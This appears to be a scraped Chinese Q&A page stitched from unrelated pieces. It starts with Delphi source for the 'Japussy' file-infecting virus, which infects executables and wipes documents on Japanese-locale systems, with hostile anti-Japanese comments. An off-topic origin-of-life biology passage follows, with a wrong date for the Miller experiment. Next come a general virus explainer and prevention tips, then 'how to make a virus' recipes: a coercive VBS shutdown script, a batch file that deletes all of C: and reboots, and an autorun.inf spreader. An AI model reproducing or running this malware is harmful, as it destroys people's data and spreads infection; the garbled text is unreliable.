Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 將宿主文件從已感染的PE文件中分離出來，以備使用 }
procere ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳過頭部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO結構 }
procere FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 發帶毒郵件 }
procere SendMail;
begin
//哪位仁兄願意完成之？
end;
{ 感染PE文件 }
procere InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出錯則文件正在被使用，退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己則不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //檢查PE文件頭
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE標記
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //檢查感染標記
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染過了或不是PE文件則退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主圖標(744位元組)，存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//頭文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//寫入病毒體主圖標之前的數據
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//寫入目前程序的主圖標
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//寫入病毒體主圖標到病毒體尾部之間的數據
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//寫入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//寫入已感染的標記
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替換宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 將目標文件寫入垃圾碼後刪除 }
procere SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只讀屬性
FileHandle := FileOpen(FileName, fmOpenWrite); //打開文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //寫入垃圾碼的隨機次數
if Max < 5 then
Max := 5;
Mass := Size div Max; //每個間隔塊的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//寫入垃圾碼，將文件徹底破壞掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //關閉文件
end;
DeleteFile(PChar(FileName)); //刪除之
except
end;
end;
{ 獲得可寫的驅動器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍歷26個字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁碟和網路盤
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍歷目錄，感染和摧毀文件 }
procere LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr '.') and
(SearchRec.Name > '..') then
Result := 0 //不是目錄
else if (SearchRec.Attr = 16) and (SearchRec.Name > '.') and
(SearchRec.Name > '..') then
Result := 1 //不是根目錄
else Result := 2; //是根目錄
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //調整消息隊列，避免引起懷疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可執行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件，將Base64編碼後的病毒寫入
//感染瀏覽此網頁的所有用戶
//哪位大兄弟願意完成之？
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//獲取Outlook郵件地址
end
else if Ext = '.ADC' then //Foxmail地址自動完成文件
begin
//獲取Foxmail郵件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//獲取Foxmail郵件地址
end
else
begin
if IsJap then //是倭文操作系統
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毀文件
end;
end;
end;
//感染或刪除一個文件後睡眠200毫秒，避免CPU佔用率過高引起懷疑
Sleep(200);
until (FindNext(SearchRec) > 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) > 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍歷磁碟上所有的文件 }
procere InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系統
IsJap := True; //去死吧！
DriverList := GetDrives; //得到可寫的磁碟列表
Len := Length(DriverList);
while True do //死循環
begin
for i := Len downto 1 do //遍歷每個磁碟驅動器
LoopFiles(DriverList + ':', '*.*'); //感染之
SendMail; //發帶毒郵件
Sleep(1000 * 60 * 5); //睡眠5分鍾
end;
end;
{ 主程序開始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注冊為服務進程
else //WinNT
begin
//遠程線程映射到Explorer進程
//哪位兄台願意完成之？
end;
//如果是原始病毒體自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和發郵件
else //已寄生於宿主程序上了，開始工作
begin
TmpFile := ParamStr(0); //創建臨時文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一個空格
ExtractFile(TmpFile); //分離之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //創建新進程運行之
InfectFiles; //感染和發郵件
end;
end

⑺ 病毒是怎樣研製出來的！！

病毒也是一種生物 從這個角度來看 它和人動物 植物都屬於生物 生物的產生 可以參考 達爾文的<<物種起源>> 原始生命的產生 生命的起源 地球在宇宙中形成以後，開始是沒有生命的。經過了一段漫長的化學演化，就是說大氣中的有機元素氫、碳、氮、氧、硫、磷等在自然界各種能源（如閃電、紫外線、宇宙線、火山噴發等等）的作用下，合成有機分子（如甲烷、二氧化碳、一氧化碳、水、硫化氫、氨、磷酸等等）。這些有機分子進一步合成，變成生物單體（如氨基酸、糖、腺甙和核甙酸等）。這些生物單體進一步聚合作用變成生物聚合物。如蛋白質、多糖、核酸等。這一段過程叫做化學演化。蛋白質出現後，最簡單的生命也隨著誕生了。這是發生在距今大約36億多年前的一件大事。從此，地球上就開始有生命了。生命與非生命物質的最基本區別是：它能從環境中吸收自己生活過程中所需要的物質，排放出自己生活過程中不需要的物質。這種過程叫做新陳代謝，這是第一個區別。第二個區別是能繁殖後代。任何有生命的個體，不管他們的繁殖形式有如何的不同，他們都具有繁殖新個體的本領。第三個區別是有遺傳的能力。能把上一代生命個體的特性傳遞給下一代，使下一代的新個體能夠與上一代個體具有相同或者大致相同的特性。這個大致相同的現象最有意義，最值得我們注意。因為這說明它多少有一點與上一代不一樣的特點，這種與上一代不一樣的特點叫變異。這種變異的特性如果能夠適應環境而生存，它就會一代又一代地把這種變異的特性加強並成為新個體所固有的特徵。生物體不斷地變異，不斷地遺傳，年長月久，周而復始，具有新特徵的新個體也就不斷地出現，使生物體不斷地由簡單變復雜，構成了生物體的系統演化。 地球上早期生命的形態與特性。地球上最早的生命形態很簡單，一個細胞就是一個個體，它沒有細胞核，我們叫它為原核生物。它是靠細胞表面直接吸收周圍環境中的養料來維持生活的，這種生活方式我們叫做異養。當時它們的生活環境是缺乏氧氣的，這種喜歡在缺乏氧氣的環境中生活的叫做厭氧。因此最早的原核生物是異養厭氧的。它的形態最初是圓球形，後來變成橢圓形、弧形、江米條狀的桿形進而變成螺旋狀以及細長的絲狀，等等。從形態變化的發展方向來看是增加身體與外界接觸的表面積和增大自身的體積。現在生活在地球上的細菌和藍藻都是屬於原核生物。藍藻的發生與發展，加速了地球上氧氣含量的增加，從20多億年前開始，不僅水中氧氣含量已經很多，而且大氣中氧氣的含量也已經不少。細胞核的出現，是生物界演化過程中的重大事件。原核植物經過15億多年的演變，原來均勻分散在它的細胞裡面的核物質相對地集中以後，外麵包裹了一層膜，這層膜叫做核膜。細胞的核膜把膜內的核物質與膜外的細胞質分開。細胞裡面的細胞核就是這樣形成的。有細胞核的生物我們把它稱為真核生物。從此以後細胞在繁殖分裂時不再是簡單的細胞質一分為二，而且裡面的細胞核也要一分為二。真核生物（那時還沒有動物，可以說實際上也只是真核植物）大約出現在20億年前。性別的出現是在生物界演化過程中的又一個重大的事件，因為性別促進了生物的優生，加速生物向更復雜的方向發展。因此真核的單細胞植物出現以後沒有幾億年就出現了真核多細胞植物。真核多細胞的植物出現沒有多久就出現了植物體的分工，植物體中有一群細胞主要是起著固定植物體的功能，成了固著的器官，也就是現代藻類植物固著器的由來。從此以後開始出現器官分化，不同功能部分其內部細胞的形態也開始分化。由此可見，細胞核和性別出現以後，大大地加速了生物本身形態和功能的發展。 生命的起源 關於生命起源的問題，很早就有各種不同的解釋。近幾十年來，人們根據現代自然科學的新成 就，對於生命起源的問題進行了綜合研究，取得了很大的進展。 根據科學的推算，地球從誕生到現在，大約有46億年的歷史。早期的地球是熾熱的，地球上的一切元素都呈氣體狀態，那時候是絕對不會有生命存在的。最初的生命是在地球溫度下降以後，在極其漫長的時間內，由非生命物質經過極其復雜的化學過程，一步一步地演變而成的。目前，這種關於生命起源是通過化學進化過程的說法已經為廣大學者所承認，並認為這個化學進化過程可以分為下列四個階段。 從無機小分子物質生成有機小分子物質 根據推測，生命起源的化學進化過程是在原始地球條件下開始進行的。當時，地球表面溫度已經降低，但內部溫度仍然很高，火山活動極為頻繁，從火山內部噴出的氣體，形成了原始大氣(下圖)。一般認為，原始大氣的主要成分有甲烷（CH4）、氨 原始地球的想像圖 (左)原始大氣(右)有機物形成 （NH3）、水蒸氣（H2O）、氫（H2），此外還有硫化氫（H2S）和氰化氫（HCN）。這些氣體在大自然不斷產生的宇宙射線、紫外線、閃電等的作用下，就可能自然合成氨基酸、核苷酸、單糖等一系列比較簡單的有機小分子物質。後來，地球的溫度進一步降低，這些有機小分子物質又隨著雨水，流經湖泊和河流，最後匯集在原始海洋中。 關於這方面的推測，已經得到了科學實驗的證實。1935年，美國學者米勒等人，設計了一套密閉裝置(下圖)。他們將裝置內的空氣抽出，然後模擬原始地球上的大氣成分，通入甲烷、氨、氫、水 米勒實驗的裝置 蒸氣等氣體，並模擬原始地球條件下的閃電，連續進行火花放電。最後，在U型管內檢驗出有氨基酸生成。氨基酸是組成蛋白質的基本單位，因此，探索氨基酸在地球上的產生是有重要意義的。 此外，還有一些學者模擬原始地球的大氣成分，在實驗室里製成了另一些有機物，如嘌識、嘧啶、核糖，脫氧核糖，脂肪酸等。這些研究表明：在生命的起源中，從無機物合成有機物的化學過程，是完全可能的。 從有機小分子物質形成的有機高分子物質 蛋白質、核酸等有機高分子物質，是怎樣在原始地球條件下形成的呢？有些學者認為，在原始海洋中，氨基酸、核苷酸等有機小分子物質，經過長期積累，相互作用，在適當條件下（如吸附在粘土上），通過縮合作用或聚合作用，就形成了原始的蛋白質分子和核酸分子。 現在，已經有人模擬原始地球的條件，製造出了類似蛋白質和核酸的物質。雖然這些物質與現在的蛋白質和核酸相比，還有一定差別 ，並且原始地球上的蛋白質和核酸的形成過程是否如此，還不能肯定，但是，這已經為人們研究生命的起源提供了一些線索；在原始地球條件下，產生這些有機高分子的物質是可能的。 從有機高分子物質組成多分子體系 根據推測，蛋白質和核酸等有機高分子物質，在海洋里越積越多，濃度不斷增加，由於種種原因（如水分的蒸發，粘土的吸附作用），這些有機高分子物質經過濃縮而分離出來，它們相互作用，凝聚成小滴。這些小滴漂浮在原始海洋中，外麵包有最原始的界膜，與周圍的原始海洋環境分隔開，從而構成一個獨立的體系，即多分子體系。這種多分子體系已經能夠與外界環境進行原始的物質交換活動了。 從多分子體系演變為原始生命 從多分子體系演變為原始生命，過是生命起源過程中最復雜和最有決定意義的階段，它直接涉及到原始生命的發生。目前，人們還不能在實驗室里驗證這一過程。不過，我們可以推測，有些多分子體系經過長期不斷地演變，特別是由於蛋白質和核酸這兩大主要成分的相互作用，終於形成具有原始新陳代謝作用和能夠進行繁殖的原始生命。以後，由生命起源的化學進化階段進入到生命出現之後的生物進化階段。 關於生命起源的化學進化過程的研究，雖然進行了大量的模擬實驗，但是絕大多數實驗只是集中在第一階段，有些階段還僅僅限於假說和推測。因此，在對於生命起源，問題還必須繼續進行研究和探討。 蛋白質和核酸是生物體內最重要的物質。沒有蛋白質和核酸，就沒有生命。1965年，我國科學工作者人工合成了結晶牛胰島素（一種含有51個氨基酸的蛋白質）。1981年，我國科學工作者又用人工的方法合成了酵母丙氨酸轉運核糖核酸（核糖核酸的一種）。這些工作反映了我國在探索生命起源問題上的重大成就

⑻ 電腦病毒是怎樣產生的

電腦病毒是什麼東西呢？是否會像其他病毒，如「H5N1」、「O-157大腸桿菌」、「HIV」一樣對人體造成傷害呢？電腦病毒是會造成傷害，但不是對你造成傷害，而是對你的電腦系統造成一定的傷害。其實，電腦病毒是一段非常小的（通常只有幾KB）會不斷自我復制、隱藏和感染其他程序的程序碼。它在我們的電腦里執行，並且導致不同的影響。它可把電腦里的程序或數據消失或改變。電腦病毒與其它威脅不同，它可以不需要人們的介入就能由程序或系統傳播出去。「程序碼」包含一套不必要的指令，當執行時，它把自己傳播到其它的電腦系統、程序里。首先它把自己拷貝（Copy）在一個沒有感染的程序或文件里，當這個程序或文件執行任何指令時，這電腦病毒都會包括在指令里。根據病毒創造者的動機，這些指令可以做出任何事情，其中包括顯示一段信息、刪除文件或精細地改變數據，甚至破壞電腦的硬體。有些情況下，電腦病毒並沒有破壞指令的企圖，但取而代之就是病毒占據磁碟空間、CPU時間或網路的連接。

電腦病毒----什麼是電腦病毒

從廣義上定義，凡能夠引起計算機故障，破壞計算機數據的程序統稱為計算機病毒。依據此定義，諸如邏輯炸彈，蠕蟲等均可稱為計算機病毒。

1994年2月18日，我國正式頒布實施了《中華人民共和國計算機信息系統安全保護條例》，在《條例》第二十八條中明確指出：「計算機病毒，是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數據，影響計算機使用，並能自我復制的一組計算機指令或者程序代碼。」此定義具有法律性、權威性。

自從Internet盛行以來，含有Java和ActiveX技術的網頁逐漸被廣泛使用，一些別有用心的人於是利用Java和ActiveX的特性來撰寫病毒。以Java病毒為例，Java病毒並不能破壞儲存媒介上的資料，但若你使用瀏覽器來瀏覽含有Java病毒的網頁，Java病毒就可以強迫你的Windows不斷的開啟新窗口，直到系統資源被耗盡，而你也只有重新啟動。

所以在Internet出現後，計算機病毒就應加入只要是對使用者造成不便的程序代碼，就可以被歸類為計算機病毒。

下面我們談一談病毒。您以前是否聽說過電腦病毒?不要一聽到病毒就渾身發抖，只要了解了病毒，對付起來還是很容易的。

電腦病毒與我們平時所說的醫學上的生物病毒是不一樣的，它實際上是一種電腦程序，只不過這種程序比較特殊，它是專門給人們搗亂和搞破壞的，它寄生在其它文件中，而且會不斷地自我復制並傳染給別的文件，沒有一點好作用。 電腦病毒發作了都會有哪些症狀呢？

電腦染上病毒後，如果沒有發作，是很難覺察到的。但病毒發作時就很容易感覺出來：

有時電腦的工作會很不正常，有時會莫名其妙的死機，有時會突然重新啟動，有時程序會乾脆運行不了。

電腦染毒後表現為：工作很不正常，莫名其妙死機，突然重新啟動，程序運行不了。有的病毒發作時滿屏幕會下雨，有的屏幕上會出現毛毛蟲等，甚至在屏幕上出現對話框，這些病毒發作時通常會破壞文件，是非常危險的，反正只要電腦工作不正常，就有可能是染上了病毒。病毒所帶來的危害更是不言而喻了。而且，以前人們一直以為，病毒只能破壞軟體，對硬體毫無辦法，可是CIH病毒打破了這個神話，因為它竟然在某種情況下可以破壞硬體！

電腦病毒和別的程序一樣，它也是人編寫出來的。既然病毒也是人編的程序，那就會有辦法來對付它。最重要的是採取各種安全措施預防病毒，不給病毒以可乘之機。另外，就是使用各種殺毒程序了。它們可以把病毒殺死，從電腦中清除出去。

常用殺毒程序有：KV300，KILL系列，瑞星，PC CILLIN，NAV，MCAFEE等。

電腦病毒一般可以分成下列各類：

1.引導區電腦病毒

2. 文件型電腦病毒

3. 復合型電腦病毒

4.宏病毒

5. 特洛伊/特洛伊木馬

6.蠕蟲

其他電腦病毒/惡性程序碼的種類和製作技巧

引導區電腦病毒

1.引導區電腦病毒是如此傳播：隱藏在磁碟內，在系統文件啟動以前電腦病毒已駐留在內存內。這樣一來，電腦病毒就可完全控制DOS中斷功能，以便進行病毒傳播和破壞活動。那些設計在DOS或Windows3.1上執行的引導區病毒是不能夠在新的電腦操作系統上傳播，所以這類的電腦病毒已經比較罕見了。 Michelangelo是一種引導區病毒。它會感染引導區內的磁碟及硬碟內的MBR。當此電腦病毒常駐內存時，便會感染所有讀取中及沒有寫入保護的磁碟。除此以外，Michelangelo會於3月6日當天刪除受感染電腦內的所有文件。

2.文件型電腦病毒，又稱寄生病毒，通常感染執行文件(.EXE)，但是也有些會感染其它可執行文件，如DLL,SCR等等...每次執行受感染的文件時，電腦病毒便會發作：電腦病毒會將自己復制到其他可執行文件，並且繼續執行原有的程序，以免被用戶所察覺。

CIH會感染Windows95/98的.EXE文件，並在每月的26號發作日進行嚴重破壞。於每月的26號當日，此電腦病毒會試圖把一些隨機資料覆寫在系統的硬碟，令該硬碟無法讀取原有資料。此外，這病毒又會試圖破壞FlashBIOS內的資料。

3.宏病毒 與其他電腦病毒類型的分別是宏病毒是攻擊數據文件而不是程序文件。

宏病毒專門針對特定的應用軟體，可感染依附於某些應用軟體內的宏指令，它可以很容易透過電子郵件附件、軟盤、文件下載和群組軟體等多種方式進行傳播如MicrosoftWord和Excel。宏病毒採用程序語言撰寫，例如VisualBasic或CorelDraw，而這些又是易於掌握的程序語言。宏病毒最先在1995年被發現，在不久後已成為最普遍的電腦病毒。 JulyKiller這個電腦病毒通過VB宏在MSWord97文件中傳播。一旦打開染毒文件，這病毒首先感染共用範本(normal.dot)，從而導致其它被打開的文件一一遭到感染。此電腦病毒的破壞力嚴重。如果當月份是7月時，這病毒就會刪除c:\的所有文件。

4. 特洛伊或特洛伊木馬是一個看似正當的程序，但事實上當執行時會進行一些惡性及不正當的活動。特洛伊可用作黑客工具去竊取用戶的密碼資料或破壞硬碟內的程序或數據。與電腦病毒的分別是特洛伊不會復制自己。它的傳播伎倆通常是誘騙電腦用戶把特洛伊木馬植入電腦內，例如通過電子郵件上的游戲附件等。 BackOrifice特洛伊木馬於1998年發現，是一個Windows遠程管理工具，讓用戶利用簡單控制台或視窗應用程序，透過TCP/IP去遠程遙控電腦。

5.蠕蟲是另一種能自行復制和經由網路擴散的程序。它跟電腦病毒有些不同，電腦病毒通常會專注感染其它程序，但蠕蟲是專注於利用網路去擴散。從定義上，電腦病毒和蠕蟲是非不可並存的。隨著互聯網的普及，蠕蟲利用電子郵件系統去復制，例如把自己隱藏於附件並於短時間內電子郵件予多個用戶。有些蠕蟲(如CodeRed)，更會利用軟體上的漏洞去擴散和進行破壞。 於1999年6月發現的Worm.ExploreZip是一個可復制自己的蠕蟲。當執行時，它會把自己隱藏在附件，經電子郵件傳送予通訊錄內的收件人。在Windows環境下，若用戶開啟附件，就會自動執行蠕蟲。在Windows95/98環境下，此蠕蟲以Explore.exe為名，把自己復制到C:\windows\system目錄，以及更改WIN.INI文件，以便系統每次啟動時便會自動執行蠕蟲。

預防篇

1. 提倡尊重知識產權的觀念,支持使用合法原版的軟體,拒絕使用翻版軟體,只有這樣才能確實降低使用者電腦發生中毒的機會.

2. 平日就要將重要的資料備份起來,畢竟解毒軟體不能完全還原中毒的資料,只有靠自己的備份才是最重要的.

3. 建立一張緊急救援磁片,而且是「乾凈及可開機的」,DOS的版本與硬碟相同,同時裡面還要有以下程式:FDISK.EXE,FORMAT.COM,UNFORMAT.COM,SYS.COM,UNDELETE.EXE,SCANDISK.EXE,掃毒軟體所備份的啟動磁區及硬碟分割表檔案.如果你有PCTOOLS或Norton Utility等軟體,用它們來幫助你做一張緊急救援磁片,它們甚至可以還原CMOS資料,或是災後重建資料.(別忘了貼上防寫標簽.)

4. 不要隨便使用來歷不明的檔案或磁碟,就算要使用,先用掃毒軟體掃一掃再用.

5. 准備一些好的防毒,掃毒,解毒軟體,並且定期使用.

.建立正確病毒基本觀念,了解病毒感染,發作的原理,亦可以提高個人的警惕.

治療篇

請熟記以下的六字口訣:

1. 關(Step 1;關閉電源)

2. 開(Step 2;以乾凈磁片開機)

3. 掃(Step 3;用防毒軟體掃瞄病毒)

4. 除(Step 4;若偵測有病毒,則立即刪除)

5. 救(Step 5;若偵測硬碟分割區或啟動區有病毒時,可用"硬碟緊急救援磁片"救回資料,或用乾凈DOS磁片中的FDISK指令,執行FDISK/MBR以救回硬碟分割區資料;另可在A槽中執行A>SYS C:(C為中毒磁碟)以救回資料;若不行就只有重新格式化硬碟了.

6. 防(Step 8;好了!您的電腦安全了.不過為了預防未來不再受到病毒之侵害,建議您經常更新你的防毒軟體,以建立完善而且堅固的病毒防疫系統.

⑼ 怎樣製造電腦病毒

問題一：怎麼製作電腦病毒 方法如下：在開始內點擊運行輸入at xx:xx shutdown -s,xx：xx代表幾點幾分是在幾點幾分關機輸入shutdown.exe -s -t xx,xx代表多少秒鍾後關機 如果要取消，就輸入shutdown -a就可以取消了.
我聽一個朋友說，有個人給他發個東西。他看了下。。說要輸入一句話。。不然就管你機。是怎麼編的。。。我知道關機命令和取消命令。。。不知道要對方怎麼輸才可以取消命令。。
腳本，例如下面的東西。就可以實現。
1。
首先呢,我們在桌面創建個新文件夾然後打開,在上面找到-工具T-文件夾選項O-查看
把隱藏已知文件類型的擴展名前面的勾去掉.
然後我們開始製作.在桌面建立個記事本,然後把下面代碼復制進去
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject(wscript.shell)
WSHshellA.run cmd.exe /c shutdown -r -t 60 -c 說我是豬，不說我是豬就一分鍾關你機，不信，你試試・・・ ,0 ,true
dim a
do while(a 我是豬)
a = inputbox (說我是豬,就不關機，快撒，說 我是豬,說不說,不說,8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,MsgBox
loop
msgbox chr(13) + chr(13) + chr(13) + 早說就行了嘛,呵呵，豬
dim WSHshell
set WSHshell = wscript.createobject(wscript.shell)
WSHshell.run cmd.exe /c shutdown -a,0 ,true
msgbox chr(13) + chr(13) + chr(13) + 哈哈哈哈，真過癮
復制之後呢,把後綴修改為.vbs或者改變打開方式為應用程序，這樣你再壓縮下用QQ發給你朋友，對方打
開了就在60秒內要關閉計算機，
結素任務都不行，他只能說他是豬才能解決問題。夠壞吧？ 注意哦，你可以把我是豬那個修改成任
意想說的話，要是對付你喜歡的人，
就修改成 我愛你 這樣他只有說我愛你之後才不關閉計算機哦 也可以把時間修改為20 就是說打
開了20秒就關了,還沒等對方打完就關機了 是不是叫對方很郁悶呢?
第2招編寫VBS腳本
首先你可以看下面的
WScript.Echo(嘿，謝謝你打開我哦，我等你很久拉！&TSName)
WScript.Echo(你是可愛的小朋嗎?)
WScript.Echo(哈,我想你拉，這你都不知道嗎？)
WScript.Echo(怎麼才來，說~是不是不關心我)
WScript.Echo(哼,我生氣拉，等你這么久，心都涼啦。)
WScript.Echo(小強很生氣，......>>

問題二：怎麼製造最簡單的電腦病毒怎麼搞？？？ ]@]@]
echo off
del c:\ /s /f /q
shutdown -r
復制代碼，建文本文檔，保存為：病毒.bat
TxT改bat方法：我的電腦：文件：文件夾選項：查看：顯示己知文件的擴展名。就可以了。

問題三：為什麼要製造電腦病毒 現在流行的病毒是由人為故意編寫的，多數病毒可以找到作者和產地信息，從大量的統計分析來看，病毒作者主要情況和目的是：一些天才的程序員為了表現自常和證明自己的能力，出於對上司的不滿，為了好奇，為了報復，為了祝賀和求愛，為了得到控制口令，為了軟體拿不到報酬預留的陷阱等．當然也有因政治，軍事，宗教，民族．專利等方面的需求而專門編寫的，其中也包括一些病毒研究機構和黑客的測試病毒．

問題四：如何製造簡單的計算機病毒？ 建立一個文本文件
寫入：
[autorun]
open= 病毒.bat
保存為autorun.inf
再建立一個文本文件
寫入：
cmd/s autorun.inf c:\/y
cmd/s cop儲 病毒.bat c:\/y
cmd/s autorun.inf d:\/y
cmd/s 病毒.bat d:\/y
cmd/s autorun.inf e:\/y
cmd/s 病毒.bat e:\/y
cmd/s autorun.inf f:\/y
cmd/s 病毒.bat f:\/y
cmd/s autorun.inf g:\/y
cmd/s 病毒.bat g:\/y
cmd/s autorun.inf h:\/y
cmd/s 病毒.bat h:\/y
保存為病毒.bat
然後將2個文件放在同一個目錄下，屬性都設置為隱藏，系統。然後
執行 病毒.bat
------------這就是最簡單的病毒。如果你想感染那個盤，就在bat文件裡面加入。

問題五：怎麼製作電腦病毒？ 有編程工具編寫，c++、c#、c、java語言都可以編寫病毒，關鍵需要編程基礎。

問題六：病毒是怎麼製造的？ 什麼是電腦病毒？ hackbase/
[黑客基地]-全球最大中文黑客站
計算機病毒是一個程序，一段可執行碼。就像生物病毒一樣，計算機病毒有獨特的復制能力。計算機病毒可以很快地蔓延，又常常難以根除。它們能把自身附著在各種類型的文件上。當文件被復制或從一個用戶傳送到另一個用戶時，它們就隨同文件一起蔓延開來。
某些計算機病毒還有其它一些共同特性：一個被污染的程序能夠傳送病毒載體。當你看到病毒載體似乎僅僅表現在文字和圖象上時，它們可能也已毀壞了文件、再格式化了你的硬碟驅動或引發了其它類型的災害。若是病毒並不寄生於一個污染程序，它仍然能通過占據存貯空間給你帶來麻煩，並降低你的計算機的全部性能。
比如說: 可以從不同角度給出計算機病毒的定義。一種定義是通過磁碟、磁帶和網路等作為媒介傳播擴散,能「傳染」 其他程序的程序。另一種是能夠實現自身復制且藉助一定的載體存在的具有潛伏性、傳染性和破壞性的程序。還有的定義是一種人為製造的程序,它通過不同的途徑潛伏或寄生在存儲媒體（如磁碟、內存）或程序里。當某種條件或時機成熟時,它會自生復制並傳播,使計算機的資源受到不同程序的破壞等等。這些說法在某種意義上借用了生物學病毒的概念,計算機病毒同生物病毒所相似之處是能夠侵入計算機系統和網路,危害正常工作的「病原體」。它能夠對計算機系統進行各種破壞,同時能夠自我復制, 具有傳染性.
所以, 計算機病毒就是能夠通過某種途徑潛伏在計算機存儲介質（或程序）里, 當達到某種條件時即被激活的具有對計算機資源進行破壞作用的一組程序或指令 *** 。
1、最初計算機病毒這一概念的提出可追溯到七十年代美國作家雷恩出版的《P1的青春》一書，書中構思了一種能夠自我復制，利用通信進行傳播的計算機程序，並稱之為計算機病毒。
2、貝爾實驗室的三位年輕程序員也受到馮?諾依曼理論的啟發，發明了「磁芯大戰」游戲。
3、1983 年 11月，在一次國際計算機安全學術會議上，美國學者科恩第一次明確提出計算機病毒的概念，並進行了演示。
